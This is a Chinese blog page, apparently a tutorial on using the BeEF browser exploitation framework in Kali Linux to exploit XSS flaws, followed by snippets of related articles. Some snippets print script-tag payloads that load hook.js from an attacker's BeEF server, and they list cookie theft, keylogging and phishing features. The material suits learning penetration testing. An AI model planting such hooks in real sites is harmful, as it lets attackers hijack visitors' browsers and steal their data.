kali漏洞利用之BeeF

Kali Linux中BeeF框架的XSS漏洞利用教程
最新推荐文章于 2025-09-22 17:18:07 发布
原创 最新推荐文章于 2025-09-22 17:18:07 发布 · 6k 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#tcp #漏洞 #测试工具 #浏览器 #框架

本文介绍了如何在Kali Linux上使用BeeF(Browser Exploitation Framework)进行XSS漏洞测试。通过开启BeeF并设置默认的用户名和密码,利用XSS漏洞将目标主机作为代理,发送自定义请求并在历史记录中查看响应。此外,还讲解了如何配置BeeF与Metasploit结合,加载Metasploit模块进行更深入的渗透测试。

对XSS漏洞往往需要一个强大的框架支持,如网络上的XSS平台,在KALI下,Beef是一款丝毫不逊于XSS平台的工具。Beef是浏览器攻击框架的简称,是一款专注于浏览器的渗透测试工具。

打开beef

beef-xss

这里写图片描述
默认用户名和密码分别为beef/beef
这里写图片描述
假设被测试主机由于XSS漏洞请求到下面这个页面
这里写图片描述
这时候可以看到,online browsers就多了一项127.0.0.1
这里写图片描述
在currentbrowser中可以看到许多信息
这里写图片描述

Proxy功能

选中目标主机,点右键,在菜单中选中use as Proxy,然后再Rider选项卡中的F

最低0.47元/天 解锁文章
Kali使用beef
路~可以走过
06-04 6106
1.使用beef 2. 出现了要修改密码的路径,才能使用 2-1.修改beef用户的默认密码,修改密码为qwe123456 root@kali:~# vi /etc/beef-xss/config.yaml 3.退出终端,再次点击beef ,启动终端 4.登录web的beef 4-1.输入beef用户和修改的密码即可登录 5.查看xss的脚本 ...
漏洞扫描(kali beef-xss、DNSlog、CSRF、SSRF)
m0_61506558的博客
08-04 2005
并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口 探测、攻击内网网站等危害。,'.yourid.ceye.io/jinyiuxin'))),1,0) 黑体处拼接SQL语句。gopher协议:是一种信息查找系统,只支持文本,不支持图像,已被HTTP替代。第三方网站利用被攻击网站生效的cookie,直接对服务器接口发起请求。抓取正常通信请求的数据包,再请求一次。.........
kali工具之Beef
m0_65129142的博客
12-22 976
简介 Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单 主要功能 信息收集: 1.网络发现 2.主机信息 3.Cookie获取 4.会话劫持 5.键盘记录 6.插件信息 持久化控制: 1.确认弹框 2.小窗口 3.中间人 社会工程: 1.点击劫持 2.弹窗告警 3.虚假页面 4.钓鱼页面 渗透攻击: 1.内网渗透
kali下安装beef-xss报错-启动失败-简单详细
最新发布
mogexiuluo的博客
09-22 632
【代码】kali下安装beef-xss报错-启动失败-简单详细。
kali beef使用
pigzlfa的博客
07-05 516
beef的安装 可以直接安装也可以从源码安装,略 beef安装好后,打开web登陆页面 http://192.168.102.130:3000/ui/panel url为kali机地址,可以从配置文件中修改 3.把js加载进存在xss的地方(例pikachu) payload: <script src='http://192.168.102.130:3000/hook.js'></script> 可以看到在不停的向102.130发起请求 使用beef中终端发送弹窗 .
BeEF利用XSS漏洞
洞若观火
10-06 2602
XSS跨站脚本攻击,检测与利用方法 poe:&lt;script&gt;alert('XSS')&lt;/script&gt; exp:&lt;script src="http://&lt;beef服务端ip&gt;:3000/hook.js"&gt;&lt;/script&gt;//攻击者ip kali下: find / -name beef-xss                   ...
kalibeef使用以及ctf.show的XSS(web316-web333)
wanan的博客
09-30 643
kalibeef使用以及ctf.show的XSS(web316-web333)
Kali Linux下利用Beef攻击浏览器实战详解
在本笔记中,我们将讨论如何利用BEEF来模拟攻击场景。 首先,攻击者需要在Kali Linux系统上启动BEEF服务。这可以通过在终端运行`netstat -anptl | grep 3000`命令来确认BEEF是否在监听3000端口。默认情况下,BEEF的...
2021Kali系列 -- XSS漏洞Beef-xss)
Web安全工具库
04-14 2081
​当我不欠任何人的时候,我就只欠我自己了。。。 ----网易云热评 一、安装beef-xss 输入beef-xss,提示安装,输入y 二、启动beef-xss 三、访问登陆页面: http://192.168.139.133:3000/ui/panel 四、让目标主机访问存在生成的钩子代码 http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.1.
精选资源
Kali Linux漏洞利用工具集目录v2018.2大学霸陆小马功钟浩.pdf
09-14
本文件主要讲述Kali Linux系统中漏洞利用阶段可能用到的工具集合,内容涉及到的工具包括但不限于Armitage、BeEF和SQLmap,以及如何使用这些工具进行漏洞挖掘和攻击演示。 首先提到的是Armitage工具。Armitage是一个...
KaliBeef使用教程
weixin_43287317的博客
04-02 5651
KaliBeef使用教程
网安工具系列:kalibeef的基础使用
weixin_54626591的博客
04-07 1354
kalibeef的基础使用
KALI LINUX WEB 渗透测试视频教程—第16课 BEEF基本使用
weixin_30904593的博客
12-23 256
Kali Linux Web 渗透测试视频教程—第16课 BeEF基本使用 文/玄魂 目录 Kali Linux Web 渗透测试视频教程—第16课 BeEF基本使用....................... 1 BeEF......................................................................
kalibeef使用
whoim_i的博客
11-03 2万+
目录一、beef介绍二、kali使用beef配置beef实际操作 一、beef介绍 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。...
【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)
Fighting_hawk的博客
02-26 5529
1. 加深理解XSS漏洞利用和危害; 2. 了解beEF工具的使用; 3. 掌握浏览器劫持的攻击方法; 4. 掌握会话劫持的攻击方法; 5. 掌握通过XSS漏洞GetShell的方法。
BeEf利用跨站脚本漏洞进行钓鱼
qq_42773814的博客
01-19 2909
BeEf 简介 BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。 BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。 最新的kali系统已经不会默认安装 BeEf ,需要我们自行安装。 apt install beef-xss 安装完成后,直接
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
热门推荐
Martin-share的博客
02-12 2万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 4025
Kali beef-xss实现Xss详细教程。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值